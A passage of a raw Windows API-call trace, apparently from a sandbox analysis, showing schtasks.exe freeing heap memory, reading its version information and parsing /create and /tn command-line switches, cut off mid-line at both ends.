dwFlags=0x0, lpMem=0x47893d0) returned 1 [0189.177] GetProcessHeap () returned 0x4780000 [0189.177] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47893d0) returned 0x14 [0189.178] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47893d0) returned 1 [0189.178] GetProcessHeap () returned 0x4780000 [0189.178] GetProcessHeap () returned 0x4780000 [0189.178] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47873b0) returned 1 [0189.178] GetProcessHeap () returned 0x4780000 [0189.178] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47873b0) returned 0x10 [0189.178] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47873b0) returned 1 [0189.178] GetProcessHeap () returned 0x4780000 [0189.178] GetProcessHeap () returned 0x4780000 [0189.178] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789330) returned 1 [0189.178] GetProcessHeap () returned 0x4780000 [0189.178] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789330) returned 0x14 [0189.179] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789330) returned 1 [0189.179] GetProcessHeap () returned 0x4780000 [0189.179] GetProcessHeap () returned 0x4780000 [0189.179] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4786640) returned 1 [0189.179] GetProcessHeap () returned 0x4780000 [0189.179] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4786640) returned 0x8 [0189.179] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4786640) returned 1 [0189.179] GetProcessHeap () returned 0x4780000 [0189.179] GetProcessHeap () returned 0x4780000 [0189.179] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789350) returned 1 [0189.179] GetProcessHeap () returned 0x4780000 [0189.179] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789350) returned 0x14 [0189.179] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789350) returned 1 [0189.179] GetProcessHeap () returned 0x4780000 [0189.180] GetProcessHeap () returned 0x4780000 [0189.180] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x478bcd8) returned 1 [0189.180] GetProcessHeap () returned 0x4780000 [0189.180] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478bcd8) returned 0x72 [0189.180] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x478bcd8) returned 1 [0189.180] GetProcessHeap () returned 0x4780000 [0189.180] GetProcessHeap () returned 0x4780000 [0189.180] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789570) returned 1 [0189.180] GetProcessHeap () returned 0x4780000 [0189.180] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789570) returned 0x14 [0189.180] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789570) returned 1 [0189.180] GetProcessHeap () returned 0x4780000 [0189.180] GetProcessHeap () returned 0x4780000 [0189.181] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47868a8) returned 1 [0189.181] GetProcessHeap () returned 0x4780000 [0189.181] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47868a8) returned 0x8 [0189.181] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47868a8) returned 1 [0189.181] GetProcessHeap () returned 0x4780000 [0189.181] GetProcessHeap () returned 0x4780000 [0189.181] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47893f0) returned 1 [0189.181] GetProcessHeap () returned 0x4780000 [0189.181] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47893f0) returned 0x14 [0189.181] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47893f0) returned 1 [0189.182] GetProcessHeap () returned 0x4780000 [0189.182] GetProcessHeap () returned 0x4780000 [0189.182] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x478abb8) returned 1 [0189.182] GetProcessHeap () returned 0x4780000 [0189.182] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x478abb8) returned 0x10 [0189.182] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x478abb8) returned 1 [0189.182] GetProcessHeap () returned 0x4780000 [0189.182] GetProcessHeap () returned 0x4780000 [0189.182] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47895f0) returned 1 [0189.182] GetProcessHeap () returned 0x4780000 [0189.182] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47895f0) returned 0x14 [0189.183] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47895f0) returned 1 [0189.183] GetProcessHeap () returned 0x4780000 [0189.183] GetProcessHeap () returned 0x4780000 [0189.183] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4786bb8) returned 1 [0189.183] GetProcessHeap () returned 0x4780000 [0189.183] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4786bb8) returned 0x6 [0189.183] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4786bb8) returned 1 [0189.183] GetProcessHeap () returned 0x4780000 [0189.183] GetProcessHeap () returned 0x4780000 [0189.183] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47895b0) returned 1 [0189.183] GetProcessHeap () returned 0x4780000 [0189.183] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x47895b0) returned 0x14 [0189.184] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x47895b0) returned 1 [0189.184] GetProcessHeap () returned 0x4780000 [0189.184] GetProcessHeap () returned 0x4780000 [0189.184] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4787398) returned 1 [0189.184] GetProcessHeap () returned 0x4780000 [0189.184] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4787398) returned 0x10 [0189.184] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4787398) returned 1 [0189.184] RtlRestoreLastWin32Error () returned 0x0 [0189.185] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0189.185] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0189.185] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0189.185] RtlVerifyVersionInfo (VersionInfo=0xdce60, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0 [0189.185] RtlRestoreLastWin32Error () returned 0x0 [0189.185] lstrlenW (lpString="create") returned 6 [0189.185] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0 [0189.185] RtlRestoreLastWin32Error () returned 0x490 [0189.185] RtlRestoreLastWin32Error () returned 0x0 [0189.185] lstrlenW (lpString="create") returned 6 [0189.185] GetProcessHeap () returned 0x4780000 [0189.185] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4789490 [0189.185] GetProcessHeap () returned 0x4780000 [0189.185] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x10) returned 0x478ab70 [0189.185] _memicmp (_Buf1=0x478ab70, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.185] GetProcessHeap () returned 0x4780000 [0189.186] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x16) returned 0x4789630 [0189.186] RtlRestoreLastWin32Error () returned 0x0 [0189.186] _memicmp (_Buf1=0x47873e0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.186] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4788ce8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0189.186] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0xdcf6c | out: lpdwHandle=0xdcf6c) returned 0x76c [0189.186] GetProcessHeap () returned 0x4780000 [0189.186] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x776) returned 0x4789dc0 [0189.186] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0x4789dc0 | out: lpData=0x4789dc0) returned 1 [0189.187] VerQueryValueW (in: pBlock=0x4789dc0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdcf74, puLen=0xdcf78 | out: lplpBuffer=0xdcf74*=0x478a170, puLen=0xdcf78) returned 1 [0189.187] _memicmp (_Buf1=0x47873e0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.187] _vsnwprintf (in: _Buffer=0x4788ce8, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdcf58 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0189.187] VerQueryValueW (in: pBlock=0x4789dc0, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdcf84, puLen=0xdcf80 | out: lplpBuffer=0xdcf84*=0x4789fa0, puLen=0xdcf80) returned 1 [0189.187] lstrlenW (lpString="schtasks.exe") returned 12 [0189.187] lstrlenW (lpString="schtasks.exe") returned 12 [0189.187] lstrlenW (lpString=".EXE") returned 4 [0189.187] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0189.187] lstrlenW (lpString="schtasks.exe") returned 12 [0189.187] lstrlenW (lpString=".EXE") returned 4 [0189.187] lstrlenW (lpString="schtasks") returned 8 [0189.187] lstrlenW (lpString="/create") returned 7 [0189.188] _memicmp (_Buf1=0x47873e0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.188] _vsnwprintf (in: _Buffer=0x4788ce8, _BufferCount=0x19, _Format="%s %s", _ArgList=0xdcf58 | out: _Buffer="schtasks /create") returned 16 [0189.188] _memicmp (_Buf1=0x4787488, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.188] GetProcessHeap () returned 0x4780000 [0189.188] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4789690 [0189.188] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.188] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0189.188] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0189.188] GetProcessHeap () returned 0x4780000 [0189.188] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x30) returned 0x47870d8 [0189.188] _vsnwprintf (in: _Buffer=0x47869e8, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdcf5c | out: _Buffer="Type \"SCHTASKS /CREATE /?\" for usage.") returned 37 [0189.188] GetProcessHeap () returned 0x4780000 [0189.189] GetProcessHeap () returned 0x4780000 [0189.189] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789dc0) returned 1 [0189.189] GetProcessHeap () returned 0x4780000 [0189.189] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789dc0) returned 0x776 [0189.189] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789dc0) returned 1 [0189.189] RtlRestoreLastWin32Error () returned 0x0 [0189.189] GetThreadLocale () returned 0x409 [0189.189] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.189] lstrlenW (lpString="create") returned 6 [0189.189] GetThreadLocale () returned 0x409 [0189.189] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.189] lstrlenW (lpString="?") returned 1 [0189.189] GetThreadLocale () returned 0x409 [0189.190] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.190] lstrlenW (lpString="s") returned 1 [0189.190] GetThreadLocale () returned 0x409 [0189.190] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.190] lstrlenW (lpString="u") returned 1 [0189.190] GetThreadLocale () returned 0x409 [0189.190] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.190] lstrlenW (lpString="p") returned 1 [0189.191] GetThreadLocale () returned 0x409 [0189.191] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.191] lstrlenW (lpString="ru") returned 2 [0189.191] GetThreadLocale () returned 0x409 [0189.191] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.191] lstrlenW (lpString="rp") returned 2 [0189.191] GetThreadLocale () returned 0x409 [0189.191] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.191] lstrlenW (lpString="sc") returned 2 [0189.191] GetThreadLocale () returned 0x409 [0189.192] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.192] lstrlenW (lpString="mo") returned 2 [0189.192] GetThreadLocale () returned 0x409 [0189.192] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.192] lstrlenW (lpString="d") returned 1 [0189.192] GetThreadLocale () returned 0x409 [0189.192] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.192] lstrlenW (lpString="m") returned 1 [0189.192] GetThreadLocale () returned 0x409 [0189.192] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.192] lstrlenW (lpString="i") returned 1 [0189.192] GetThreadLocale () returned 0x409 [0189.192] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.192] lstrlenW (lpString="tn") returned 2 [0189.192] GetThreadLocale () returned 0x409 [0189.192] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.192] lstrlenW (lpString="tr") returned 2 [0189.192] GetThreadLocale () returned 0x409 [0189.193] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.193] lstrlenW (lpString="st") returned 2 [0189.193] GetThreadLocale () returned 0x409 [0189.193] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.193] lstrlenW (lpString="sd") returned 2 [0189.193] GetThreadLocale () returned 0x409 [0189.193] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.193] lstrlenW (lpString="ed") returned 2 [0189.193] GetThreadLocale () returned 0x409 [0189.193] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.193] lstrlenW (lpString="it") returned 2 [0189.193] GetThreadLocale () returned 0x409 [0189.193] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.193] lstrlenW (lpString="et") returned 2 [0189.194] GetThreadLocale () returned 0x409 [0189.194] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.194] lstrlenW (lpString="k") returned 1 [0189.194] GetThreadLocale () returned 0x409 [0189.194] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.194] lstrlenW (lpString="du") returned 2 [0189.194] GetThreadLocale () returned 0x409 [0189.194] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.194] lstrlenW (lpString="ri") returned 2 [0189.194] GetThreadLocale () returned 0x409 [0189.194] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.194] lstrlenW (lpString="z") returned 1 [0189.194] GetThreadLocale () returned 0x409 [0189.194] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.194] lstrlenW (lpString="f") returned 1 [0189.194] GetThreadLocale () returned 0x409 [0189.195] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.195] lstrlenW (lpString="v1") returned 2 [0189.195] GetThreadLocale () returned 0x409 [0189.195] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.195] lstrlenW (lpString="xml") returned 3 [0189.195] GetThreadLocale () returned 0x409 [0189.195] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.195] lstrlenW (lpString="ec") returned 2 [0189.195] GetThreadLocale () returned 0x409 [0189.195] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.195] lstrlenW (lpString="rl") returned 2 [0189.200] GetThreadLocale () returned 0x409 [0189.201] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.201] lstrlenW (lpString="delay") returned 5 [0189.201] GetThreadLocale () returned 0x409 [0189.201] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.201] lstrlenW (lpString="np") returned 2 [0189.201] GetThreadLocale () returned 0x409 [0189.201] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.201] lstrlenW (lpString="hresult") returned 7 [0189.201] RtlRestoreLastWin32Error () returned 0x0 [0189.201] RtlRestoreLastWin32Error () returned 0x0 [0189.201] lstrlenW (lpString="/create") returned 7 [0189.202] lstrlenW (lpString="-/") returned 2 [0189.202] StrChrIW (lpStart="-/", wMatch=0x471002f) returned="/" [0189.202] lstrlenW (lpString="create") returned 6 [0189.202] lstrlenW (lpString="create") returned 6 [0189.202] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.202] lstrlenW (lpString="create") returned 6 [0189.202] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.203] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0189.203] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0189.203] lstrlenW (lpString="|create|") returned 8 [0189.203] lstrlenW (lpString="|create|") returned 8 [0189.203] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|" [0189.203] RtlRestoreLastWin32Error () returned 0x0 [0189.203] RtlRestoreLastWin32Error () returned 0x0 [0189.203] RtlRestoreLastWin32Error () returned 0x0 [0189.203] lstrlenW (lpString="/tn") returned 3 [0189.203] lstrlenW (lpString="-/") returned 2 [0189.203] StrChrIW (lpStart="-/", wMatch=0x471002f) returned="/" [0189.203] lstrlenW (lpString="create") returned 6 [0189.204] lstrlenW (lpString="create") returned 6 [0189.204] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.204] lstrlenW (lpString="tn") returned 2 [0189.204] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.204] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0189.204] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0189.204] lstrlenW (lpString="|create|") returned 8 [0189.204] lstrlenW (lpString="|tn|") returned 4 [0189.204] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0189.204] RtlRestoreLastWin32Error () returned 0x490 [0189.204] lstrlenW (lpString="?") returned 1 [0189.205] lstrlenW (lpString="?") returned 1 [0189.205] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.205] lstrlenW (lpString="tn") returned 2 [0189.205] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.205] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3 [0189.205] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0189.205] lstrlenW (lpString="|?|") returned 3 [0189.205] lstrlenW (lpString="|tn|") returned 4 [0189.205] RtlRestoreLastWin32Error () returned 0x490 [0189.205] lstrlenW (lpString="s") returned 1 [0189.205] lstrlenW (lpString="s") returned 1 [0189.205] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.205] lstrlenW (lpString="tn") returned 2 [0189.205] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.205] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3 [0189.205] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0189.205] lstrlenW (lpString="|s|") returned 3 [0189.205] lstrlenW (lpString="|tn|") returned 4 [0189.206] RtlRestoreLastWin32Error () returned 0x490 [0189.206] lstrlenW (lpString="u") returned 1 [0189.206] lstrlenW (lpString="u") returned 1 [0189.206] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.206] lstrlenW (lpString="tn") returned 2 [0189.206] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.206] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3 [0189.206] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0189.206] lstrlenW (lpString="|u|") returned 3 [0189.206] lstrlenW (lpString="|tn|") returned 4 [0189.206] RtlRestoreLastWin32Error () returned 0x490 [0189.206] lstrlenW (lpString="p") returned 1 [0189.206] lstrlenW (lpString="p") returned 1 [0189.206] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.206] lstrlenW (lpString="tn") returned 2 [0189.206] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.206] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3 [0189.206] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0189.206] lstrlenW (lpString="|p|") returned 3 [0189.207] lstrlenW (lpString="|tn|") returned 4 [0189.207] RtlRestoreLastWin32Error () returned 0x490 [0189.207] lstrlenW (lpString="ru") returned 2 [0189.207] lstrlenW (lpString="ru") returned 2 [0189.207] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.207] lstrlenW (lpString="tn") returned 2 [0189.207] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.207] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4 [0189.207] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0189.207] lstrlenW (lpString="|ru|") returned 4 [0189.207] lstrlenW (lpString="|tn|") returned 4 [0189.207] StrStrIW (lpFirst="|ru|", lpSrch="|tn|") returned 0x0 [0189.207] RtlRestoreLastWin32Error () returned 0x490 [0189.207] lstrlenW (lpString="rp") returned 2 [0189.207] lstrlenW (lpString="rp") returned 2 [0189.207] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.207] lstrlenW (lpString="tn") returned 2 [0189.208] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.208] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4 [0189.208] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0189.208] lstrlenW (lpString="|rp|") returned 4 [0189.208] lstrlenW (lpString="|tn|") returned 4 [0189.208] StrStrIW (lpFirst="|rp|", lpSrch="|tn|") returned 0x0 [0189.208] RtlRestoreLastWin32Error () returned 0x490 [0189.208] lstrlenW (lpString="sc") returned 2 [0189.208] lstrlenW (lpString="sc") returned 2 [0189.208] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.208] lstrlenW (lpString="tn") returned 2 [0189.208] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.208] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0189.208] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0189.208] lstrlenW (lpString="|sc|") returned 4 [0189.208] lstrlenW (lpString="|tn|") returned 4 [0189.209] StrStrIW (lpFirst="|sc|", lpSrch="|tn|") returned 0x0 [0189.209] RtlRestoreLastWin32Error () returned 0x490 [0189.209] lstrlenW (lpString="mo") returned 2 [0189.209] lstrlenW (lpString="mo") returned 2 [0189.209] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.209] lstrlenW (lpString="tn") returned 2 [0189.209] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.209] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0189.209] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0189.209] lstrlenW (lpString="|mo|") returned 4 [0189.209] lstrlenW (lpString="|tn|") returned 4 [0189.209] StrStrIW (lpFirst="|mo|", lpSrch="|tn|") returned 0x0 [0189.209] RtlRestoreLastWin32Error () returned 0x490 [0189.209] lstrlenW (lpString="d") returned 1 [0189.209] lstrlenW (lpString="d") returned 1 [0189.209] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.210] lstrlenW (lpString="tn") returned 2 [0189.210] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.210] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|d|") returned 3 [0189.210] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0189.210] lstrlenW (lpString="|d|") returned 3 [0189.210] lstrlenW (lpString="|tn|") returned 